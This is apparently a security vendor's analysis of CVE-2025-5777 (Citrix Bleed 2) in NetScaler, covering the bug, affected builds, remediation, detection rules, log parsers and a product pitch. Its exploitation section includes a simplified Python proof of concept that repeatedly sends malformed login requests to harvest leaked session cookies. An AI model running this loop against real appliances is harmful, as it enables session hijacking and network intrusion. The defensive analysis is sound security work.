Vulnerability Analysis

CVE-2025-5777 (Citrix Bleed 2): NetScaler Memory Disclosure Deep Dive

A second Citrix Bleed leaks session tokens from NetScaler ADC and Gateway memory. We dissect the buffer over-read and the IR playbook.

James
Threat Research Lead
5 min read

On June 17, 2025, Citrix released CTX693420 for CVE-2025-5777, an instance of insufficient input validation in NetScaler ADC and NetScaler Gateway that allows unauthenticated attackers to read memory contents from the appliance. The CVSS v3.1 score is 9.3 and the bug is reachable when the appliance is configured as a Gateway (VPN virtual server, ICA proxy, CVPN, RDP proxy) or AAA virtual server. The community immediately nicknamed it Citrix Bleed 2, recognizing the same family as 2023's CVE-2023-4966, which was the foothold for the Boeing, Comcast Xfinity, and ICBC ransomware events. CISA added CVE-2025-5777 to KEV in late June after active exploitation began on June 23, almost two weeks before any public proof-of-concept dropped.

What is the bug?

The login endpoint of the NetScaler Gateway processes a POST request whose login= parameter is consumed by nsppe, the NetScaler packet engine. The engine builds a response that includes an error message string, but the buffer used to format that string is sized based on the request's Content-Length rather than the actual number of bytes parsed. By sending a request with a small parsed login value and a deliberately oversized Content-Length, the appliance reads an additional 128 to 4096 bytes of uninitialized memory beyond the parsed input and includes it in the HTTP response.

That uninitialized memory frequently contains fragments of recent ICA session tokens, AAA cookies, and NetScaler configuration data. By sending the malformed request thousands of times in rapid succession, an attacker accumulates session tokens that are immediately usable to impersonate authenticated users — exactly the same pattern as the original Citrix Bleed in 2023.

The bug class is CWE-126 (buffer over-read), the same class that gave the world Heartbleed in 2014. That NetScaler shipped a Heartbleed-style over-read in 2025 reflects the age of the underlying packet-engine codebase.

How is it exploited?

The exploit is exactly one request, repeated. A simplified Python proof-of-concept:

import requests

target  = "https://netscaler.target.example"
session = requests.Session()

# Trigger the over-read by lying about Content-Length
headers = {"Content-Type": "application/x-www-form-urlencoded"}

for i in range(5000):
    body    = "login="                           # short parsed value
    over    = "X" * 4096                         # padding included via lie
    headers["Content-Length"] = str(len(body) + 4096)

    r = session.post(f"{target}/p/u/doAuthentication.do",
                     data=body, headers=headers, verify=False)

    leaked = r.text                              # response embeds leaked memory
    if "NSC_AAAC=" in leaked:
        print("[+] Captured AAA session cookie")
        print(leaked)

Observed in-the-wild exploitation began on June 23, 2025 against NetScaler Gateway appliances exposed to the public internet. ReliaQuest and Akamai both reported the same tradecraft: attacker harvests tokens, replays them against the Gateway, lands in a published Citrix Workspace, and uses RDP-over-Citrix to pivot into the internal network. Several confirmed ransomware incidents in summer 2025 — particularly against U.S. logistics and healthcare orgs — were traced back to Citrix Bleed 2 as the initial access vector.

Who is affected?

The advisory lists NetScaler ADC and Gateway versions:

  • 14.1 before 14.1-43.56
  • 13.1 before 13.1-58.32
  • 13.1-FIPS / NDcPP before 13.1-37.235
  • 12.1-FIPS before 12.1-55.328

Versions 12.1 and 13.0 are end-of-life and do not receive a fix. Citrix's mandatory guidance for those builds is to upgrade to a supported version immediately. Any appliance configured as a Gateway VPN virtual server, ICA-proxy server, CVPN, RDP proxy, or AAA virtual server is exposed. Appliances used only for load balancing are not affected, because the vulnerable code path is in the authentication handler.
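To turn the advisory's version list into something an inventory script can evaluate, here is an added Python check; it is example code, not from Citrix or the original post. It encodes the fixed builds listed above, treats 12.1 and 13.0 as end-of-life, and keeps the FIPS/NDcPP lines separate from the mainline 13.1 fix. The `14.1-43.56` input format and the `fips` flag are assumptions about how you record each appliance's build string.

```python
# Added example (not from CTX693420 or the original post): evaluate a NetScaler
# build string against the fixed builds listed in the advisory for CVE-2025-5777.
# Input format "14.1-43.56" and the `fips` flag are assumptions about how the
# appliance's build string is recorded in an inventory.
from dataclasses import dataclass
from typing import Dict, Tuple

# Branch -> first fixed build, copied from the advisory list. FIPS/NDcPP builds
# get their own key so a 13.1-FIPS box is not judged against the mainline fix.
FIXED_BUILDS: Dict[str, str] = {
    "14.1": "14.1-43.56",
    "13.1": "13.1-58.32",
    "13.1-FIPS": "13.1-37.235",
    "12.1-FIPS": "12.1-55.328",
}

# Branches the advisory marks end-of-life: no fix ships, every build is exposed.
EOL_BRANCHES = {"12.1", "13.0"}


def parse_build(build: str) -> Tuple[Tuple[int, ...], Tuple[int, ...]]:
    """Split '14.1-43.56' into ((14, 1), (43, 56)) so tuples compare numerically
    (string comparison would rank '13.1-9.1' above '13.1-58.32')."""
    release, sep, number = build.strip().partition("-")
    if not sep or not number:
        raise ValueError(f"expected '<release>-<build>', got {build!r}")
    return (tuple(int(p) for p in release.split(".")),
            tuple(int(p) for p in number.split(".")))


@dataclass
class Verdict:
    vulnerable: bool
    reason: str


def assess(build: str, fips: bool = False) -> Verdict:
    """Decide whether a build needs action for CVE-2025-5777.

    fips=True selects the FIPS/NDcPP fixed-build line for the same release.
    """
    release, number = parse_build(build)
    branch = ".".join(str(p) for p in release)
    key = f"{branch}-FIPS" if fips else branch
    fixed = FIXED_BUILDS.get(key)
    if fixed is None:
        if branch in EOL_BRANCHES:
            return Verdict(True, f"{branch} is end-of-life and receives no fix; upgrade")
        return Verdict(False, f"{key} is not listed in the advisory; verify manually")
    _, fixed_number = parse_build(fixed)
    if number < fixed_number:
        return Verdict(True, f"{build} is below the fixed build {fixed}")
    return Verdict(False, f"{build} is at or above the fixed build {fixed}")


if __name__ == "__main__":
    # Constructed inventory entries, not real appliances.
    for build, fips in [("14.1-43.50", False), ("13.1-37.235", True),
                        ("13.1-37.235", False), ("13.0-92.21", False)]:
        v = assess(build, fips)
        print(f"{build:<14} fips={fips!s:<5} vulnerable={v.vulnerable!s:<5} {v.reason}")
```

Note that the same build number gives opposite answers depending on the `fips` flag: 13.1-37.235 is the fixed build on the FIPS/NDcPP line but sits far below 13.1-58.32 on mainline 13.1, so an inventory that drops the FIPS attribute will misjudge those appliances.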

Critical post-patch step from the Citrix advisory: kill all active ICA and PCoIP sessions after patching, because tokens captured before the patch remain valid until their natural expiration (often eight or more hours).

# On the NetScaler CLI
kill icaconnection -all
kill pcoipConnection -all
kill aaa session -all

Forgetting this step is the single most common reason organizations remain compromised after applying the patch.

What does patching require?

NetScaler patching is a firmware upgrade with a brief HA failover. Beyond the upgrade, organizations must rotate any credentials that may have been captured in leaked memory. This is more nuanced than it sounds: NetScaler holds long-lived AAA bind passwords, RADIUS shared secrets, and LDAP service-account credentials in process memory. If any of those were captured, they enable lateral movement that survives the patch. Citrix's full remediation guidance instructs operators to assume those secrets are exposed and rotate them all.

How do you detect exploitation?

The detection signal is HTTP requests to /p/u/doAuthentication.do (or /cgi/login) with Content-Length headers significantly exceeding the body's login= parameter length. NetScaler logs these in /var/log/ns.log:

06/23/2025:14:11:09 GMT  ns SSLVPN Message 1234 0 :  "Httplogin :
  login=<empty> contentLen=4196 user-agent=python-requests/2.32.3"

The 2023 Citrix Bleed exposure burned the lesson into many NetScaler operators: ingest ns.log into the SIEM, and alert on any authentication-endpoint request whose body length is less than 32 bytes but whose Content-Length is greater than 1024. A sigma rule:

title: NetScaler Bleed-Style Authentication Probe
logsource:
  product: netscaler
  service: ns-log
detection:
  selection:
    cs-uri-stem|contains: '/p/u/doAuthentication.do'
    cs-bytes|gt: 1024
    cs-body|lt: 32
  condition: selection
level: high
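As an added example (not from the original post), the same test as the Sigma rule can be run directly over ns.log text in Python, which is useful for validating the thresholds against historical logs before the rule goes live. The log lines are constructed to follow the Httplogin format shown above, including one entry wrapped onto a second line the way the post's own sample is; the thresholds (parsed login under 32 bytes, Content-Length over 1024) are the post's, not a vendor value.

```python
# Added example (not from the original post): flag Citrix Bleed 2-style probes in
# ns.log text using the same test as the Sigma rule above, a short parsed login
# paired with a large declared Content-Length. The log lines below are constructed
# to follow the Httplogin format shown in the post, including one wrapped entry.
import re
from dataclasses import dataclass
from typing import Iterator, List

# Thresholds from the post; tune against your own baseline before alerting.
MAX_LOGIN_LEN = 32
MIN_CONTENT_LEN = 1024

# Constructed sample, not a real appliance log.
SAMPLE_NS_LOG = """\
06/23/2025:14:11:09 GMT  ns SSLVPN Message 1234 0 :  "Httplogin : login=<empty> contentLen=4196 user-agent=python-requests/2.32.3"
06/23/2025:14:11:10 GMT  ns SSLVPN Message 1235 0 :  "Httplogin : login=<empty> contentLen=4196 user-agent=python-requests/2.32.3"
06/23/2025:14:11:11 GMT  ns SSLVPN Message 1236 0 :  "Httplogin :
  login=x contentLen=2048 user-agent=curl/8.5.0"
06/23/2025:14:12:03 GMT  ns SSLVPN Message 1237 0 :  "Httplogin : login=jdoe contentLen=57 user-agent=Mozilla/5.0"
06/23/2025:14:13:45 GMT  ns SSLVPN Message 1238 0 :  "Httplogin : login=alice.smith contentLen=61 user-agent=Citrix Workspace"
06/23/2025:14:14:00 GMT  ns SSLVPN Message 1239 0 :  "AAA Message : unrelated event"
"""

HTTPLOGIN_RE = re.compile(
    r"^(?P<ts>\d{2}/\d{2}/\d{4}:\d{2}:\d{2}:\d{2}) GMT\s+.*?"
    r"Httplogin\s*:\s*login=(?P<login>\S*)\s+contentLen=(?P<clen>\d+)"
    r'(?:\s+user-agent=(?P<ua>[^"]*))?'
)


@dataclass
class Probe:
    timestamp: str
    login_len: int
    content_len: int
    user_agent: str


def iter_records(text: str) -> Iterator[str]:
    """Yield one logical record per entry, re-joining continuation lines that
    start with whitespace (the post's own sample is wrapped that way)."""
    current = None
    for raw in text.splitlines():
        if not raw.strip():
            continue
        if raw[0].isspace() and current is not None:
            current += " " + raw.strip()
        else:
            if current is not None:
                yield current
            current = raw
    if current is not None:
        yield current


def find_probes(text: str) -> List[Probe]:
    """Return Httplogin records whose parsed login is short but whose declared
    Content-Length is large, the over-read signature described in the post."""
    probes: List[Probe] = []
    for record in iter_records(text):
        m = HTTPLOGIN_RE.search(record)
        if not m:
            continue
        login = m.group("login")
        # NetScaler prints <empty> for a blank value; treat it as zero bytes.
        login_len = 0 if login == "<empty>" else len(login)
        content_len = int(m.group("clen"))
        if login_len < MAX_LOGIN_LEN and content_len > MIN_CONTENT_LEN:
            probes.append(Probe(m.group("ts"), login_len, content_len,
                                (m.group("ua") or "").strip()))
    return probes


if __name__ == "__main__":
    for p in find_probes(SAMPLE_NS_LOG):
        print(f"{p.timestamp} login={p.login_len}B contentLen={p.content_len} ua={p.user_agent!r}")
```

Run against the constructed sample, the two python-requests entries and the wrapped curl entry are flagged while the two ordinary logins are not; the continuation-line handling matters because a naive line-by-line grep for `contentLen=` would miss the wrapped record's timestamp and message header entirely.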

Also monitor for ICA session establishments from previously unseen source IPs in a short window — token replay shows up as many sessions to many different VDAs from one source.
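The replay pattern can be expressed as a small detector as well. This is an added example with constructed session records, not code from the original post: it groups ICA session establishments by source IP, counts the distinct VDAs and users seen inside a sliding time window, and applies a lower fan-out threshold to sources absent from a baseline of known IPs. The record fields, window size, thresholds and the IP addresses (RFC 5737 documentation ranges) are all assumptions.

```python
# Added example (not from the original post): surface token-replay fan-out, many
# ICA sessions from one source to many VDAs in a short window, with a lower
# threshold for source IPs absent from a baseline. Record fields, window size,
# thresholds and the RFC 5737 addresses are all constructed assumptions.
from collections import defaultdict, deque
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Deque, Dict, Iterable, List, Set

WINDOW = timedelta(minutes=10)
FANOUT_KNOWN_SOURCE = 5    # distinct VDAs inside WINDOW from a baseline IP
FANOUT_NEW_SOURCE = 3      # stricter for an IP never seen before


@dataclass(frozen=True)
class IcaSession:
    ts: datetime
    source_ip: str
    user: str
    vda: str


def _s(hh: int, mm: int, ip: str, user: str, vda: str) -> IcaSession:
    return IcaSession(datetime(2025, 6, 23, hh, mm), ip, user, vda)


# Constructed sample: an office NAT in the baseline with normal activity, a single
# new remote user, and one unseen source fanning out across six VDAs in four minutes.
KNOWN_SOURCES: Set[str] = {"198.51.100.20"}
SAMPLE_SESSIONS: List[IcaSession] = [
    _s(9, 0, "198.51.100.20", "jdoe", "vda-01"),
    _s(9, 45, "198.51.100.20", "asmith", "vda-02"),
    _s(10, 30, "198.51.100.20", "jdoe", "vda-01"),
    _s(11, 0, "198.51.100.20", "bnguyen", "vda-03"),
    _s(12, 0, "192.0.2.44", "clee", "vda-02"),
    _s(14, 20, "203.0.113.7", "jdoe", "vda-01"),
    _s(14, 21, "203.0.113.7", "asmith", "vda-02"),
    _s(14, 22, "203.0.113.7", "bnguyen", "vda-03"),
    _s(14, 22, "203.0.113.7", "clee", "vda-04"),
    _s(14, 23, "203.0.113.7", "jdoe", "vda-05"),
    _s(14, 24, "203.0.113.7", "dkim", "vda-06"),
]


def replay_suspects(sessions: Iterable[IcaSession],
                    known_sources: Set[str]) -> Dict[str, dict]:
    """Map each suspicious source IP to its peak VDA/user fan-out inside WINDOW."""
    by_src: Dict[str, List[IcaSession]] = defaultdict(list)
    for s in sorted(sessions, key=lambda x: x.ts):
        by_src[s.source_ip].append(s)

    findings: Dict[str, dict] = {}
    for src, sess in by_src.items():
        window: Deque[IcaSession] = deque()
        peak_vdas = peak_users = 0
        for s in sess:
            window.append(s)
            # Drop sessions older than WINDOW relative to the newest one.
            while s.ts - window[0].ts > WINDOW:
                window.popleft()
            peak_vdas = max(peak_vdas, len({w.vda for w in window}))
            peak_users = max(peak_users, len({w.user for w in window}))
        new_source = src not in known_sources
        threshold = FANOUT_NEW_SOURCE if new_source else FANOUT_KNOWN_SOURCE
        if peak_vdas >= threshold:
            findings[src] = {"peak_vdas": peak_vdas, "peak_users": peak_users,
                             "new_source": new_source}
    return findings


if __name__ == "__main__":
    for src, f in replay_suspects(SAMPLE_SESSIONS, KNOWN_SOURCES).items():
        print(src, f)
```

The user fan-out is reported alongside the VDA fan-out because a single replayed token maps to one user; one source reaching five different users in four minutes is the shape of a harvested-token batch rather than one person's workday, and it is the figure that tells the responder how many sessions to kill and how many accounts to review.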

How Safeguard Helps

Safeguard's appliance inventory maps every NetScaler ADC and Gateway against Citrix CTX advisories and CISA KEV. When CVE-2025-5777 dropped, customers received exact firmware-build-level findings on the same day, with reachability scoring distinguishing internet-facing Gateways from internal-only ADC load balancers. Griffin AI correlates the active KEV exploitation timeline (in-the-wild from June 23) with each customer's specific build to set patching priority. Post-patch, Safeguard's session-rotation runbook automates the kill aaa session step plus enumerates downstream credential rotations (RADIUS, LDAP bind, SAML signing keys), turning the multi-step Citrix recovery procedure into a single workflow. For continuous coverage, policy gates block any new NetScaler image deployment below the 14.1-43.56 baseline.
